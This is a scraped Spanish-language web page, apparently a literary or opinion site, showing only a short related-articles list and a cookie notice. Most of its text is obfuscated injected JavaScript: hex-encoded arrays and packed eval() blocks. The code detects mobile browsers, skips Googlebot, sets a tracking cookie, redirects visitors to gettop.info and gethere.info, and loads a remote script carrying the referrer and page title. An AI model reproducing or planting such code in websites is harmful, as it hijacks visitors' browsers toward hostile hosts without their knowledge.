|kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4)))window.location=b})(navigator.userAgent||navigator.vendor||window.opera,’http://gettop.info/kt/?53vSkc&’);eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}}eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘z(1d.1k.1l(“16”)==-1){(2V(a,b){z(a.1l(“2W”)==-1){z(/(2X|2U\\d+|2T).+1b|2P|2Q\\/|2R|2S|2Y|2Z|37|38|39|G(36|B|L)|W|35|30 |31|33|34|1b.+2O|2N|1i m(2z|2A)i|2B( K)?|2y|p(2x|2t)\\/|2u|2v|2w|2C(4|6)0|2D|2K|M\\.(2L|2M)|2J|2I|2E 2F|2G|2H/i.17(a)||/3a|3b|3E|3F|3G|50[1-6]i|3D|3C|a D|3y|X(N|Z|s\\-)|Y(3z|3A)|O(3B|1g|U)|3H|3I(3P|x|3Q)|3R|P(3O|A)|3N(j|3J)|3K|3L(3M|\\-m|r |s )|3x|3w(I|S|3i)|1a(3j|3k)|3h(X|3g)|3c(e|v)w|3d|3e\\-(n|u)|3f\\/|3l|3m|2s\\-|3u|3v|3s|3r\\-|U(3n|R)|3o|3p(V|S|3q)|3S|2l\\-s|1B|1x|1y|1c(c|p)o|1E(12|\\-d)|1J(49|Y)|1w(1H|1F)|N(1m|1n)|1o|1v([4-7]0|K|D|1p)|1s|1q(\\-|15)|F u|1r|1I|2r\\-5|g\\-y|A(\\.w|B)|2f(L|29)|2a|2b|2i\\-(m|p|t)|2o\\-|2p(J|14)|2n( i|G)|2j\\-c|2k(c(\\-| |15|a|g|p|s|t)|28)|27(1S|1T)|i\\-(20|A|q)|1R|1Q( |\\-|\\/)|1N|1O|1P|1V|1W|24|25|W|23(t|v)a|22|1X|1Y|1Z|2e|26( |\\/)|1U|2m |2q\\-|2h(c|k)|2c(2d|2g)|1M( g|\\/(k|l|u)|50|54|\\-[a-w])|1t|1u|1L\\-w|1G|1K\\/|q(j|1D|1z)|Q(f|21|1g)|m\\-1A|1C(3t|T)|4p(5E|5F|E)|5G|y(f|5D|1a|5C|1c|t(\\-| |o|v)|5z)|5A(50|3T|v )|5H|5I|5O[0-2]|5P[2-3]|5N(0|2)|5M(0|2|5)|5J(0(0|1)|10)|5K((c|m)\\-|5L|5y|5x|5l|5m)|5n(6|i)|5k|5j|5g(5h|5i)|5o|5p|5v|5R(a|d|t)|5u|5t(13|\\-([1-8]|c))|5q|5r|C(5s|5Q)|67\\-2|65(I|69|11)|63|64|J\\-g|5U\\-a|5Z(5Y|12|21|32|60|\\-[2-7]|i\\-)|5X|66|6a|6c|6b|5V(5T|62)|5W\\/|5S(6d|q|68|5w|x|5e)|4m(f|h\\-|Z|p\\-)|4n\\/|11(c(\\-|0|1)|47|Q|R|T)|4o\\-|4l|4k(\\-|m)|4h\\-0|4i(45|4j)|5f(O|P|4q|V|4w)|4x(4v|x)|4u(f|h\\-|v\\-|v )|4r(f|4s)|4t(18|50)|4g(4f|10|18)|14(3Z|41)|42\\-|3Y\\-|3X(i|m)|3U\\-|t\\-y|3V(C|3W)|E(H|m\\-|43|44)|4d\\-9|M(\\.b|F|4e)|4c|4b|46|48|4a(4y|j)|4z(40|5[0-3]|\\-v)|4Y|4Z|51|4X(52|53|60|61|H|4W|4T|4U|4V|55)|56(\\-| )|5c|5d|5b(g |5a|57)|58|59|4S|4R\\-|4F|4G|4H\\-/i.17(a.4E(0,4))){4D 1e=1h 19(1h 19().4A()+4B);1d.1k=”16=1; 4C=/;4I=”+1e.4J();1j.4P=b}}})(1f.4Q||1f.4O||1j.1i,\’4N://4K.4L/4M/?5B&\’)}’,62,386,’|||||||||||||||01||||te|||||||ma|||||||ny|mo|if|go|od|pl|wa|ts|g1|ip|70|ck|pt|os|ad|up|er|al|ar|mc|nd|ll|ri|co|it|iris|ac|ai|oo||se|||ta|_|_mauthtoken|test||Date|bi|mobile|do|document|tdate|navigator|ca|new|opera|window|cookie|indexOf|ic|k0|esl8|ze|fly|g560|fetc|libw|lynx|ez|em|dica|dmob|xo|cr|devi|me|ui|ds|ul|m3ga|l2|gene|el|m50|m1|lg|ibro|idea|ig01|iac|i230|aw|tc|klon|ikom|im1k|jemu|jigs|kddi|||jbro|ja|inno|ipaq|kgt|hu|tp|un|haie|hcit|le|no|keji|gr|xi|kyo|hd|hs|ht|dc|kpt|hp|hei|hi|kwc|gf|cdm|re|plucker|pocket|psp|ixi|phone|ob|in|palm|series|symbian|windows|ce|xda|xiino|wap|vodafone|treo|browser|link|netfront|firefox|avantgo|bada|blackberry|blazer|meego|bb|function|Googlebot|android|compal|elaine|lge|maemo||midp|mmp|kindle|hone|fennec|hiptop|iemobile|1207|6310|br|bumb|bw|c55|az|bl|nq|lb|rd|capi|ccwa|mp|craw|da|ng|cmd|cldc|rc|cell|chtm|be|avan|abac|ko|rn|av|802s|770s|6590|3gso|4thp|amoi|an|us|attw|au|di|as|ch|ex|yw|aptu|dbte|p1|tim|to|sh|tel|tdg|gt||lk|tcl|m3|m5||v750||veri||vi|v400|utst|tx|si|00|t6|sk|sl|id|sie|shar|sc|sdk|sgh|mi|b3|sy|mb|t2|sp|ft|t5|so|rg|vk|getTime|1800000|path|var|substr|your|zeto|zte|expires|toUTCString|gettop|info|kt|http|vendor|location|userAgent|yas|x700|81|83|85|80|vx|vm40|voda||vulc||||98|w3c|nw|wmlb|wonu|nc|wi|webc|whit|va|sm|op|ti|wv|o2im|nzph|wg|wt|nok|oran|owg1|phil|pire|ay|pg|pdxg|p800|ms|wf|tf|zz|mt|BFzSww|de|02|o8|oa|mmef|mwbp|mywa|n7|ne|on|n50|n30|n10|n20|uc|pan|sa|ve|qa|ro|s55|qtek|07|qc|||zo|prox|psio|po|r380|pn|mm|rt|r600|rim9|raks|ge’.split(‘|’),0,{}))var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Relacionados

El encuentro al final del camino

Moámmer Al-Muháyir

Profeta en el olvido

Maim

SupermA?n es A?rabe

Farah Azcona
Cargando....

Esta web usa cookies para mejorar tu experiencia de navegación. Asumimos que está de acuerdo con esto, pero puede optar salir si lo desea. Aceptar Leer más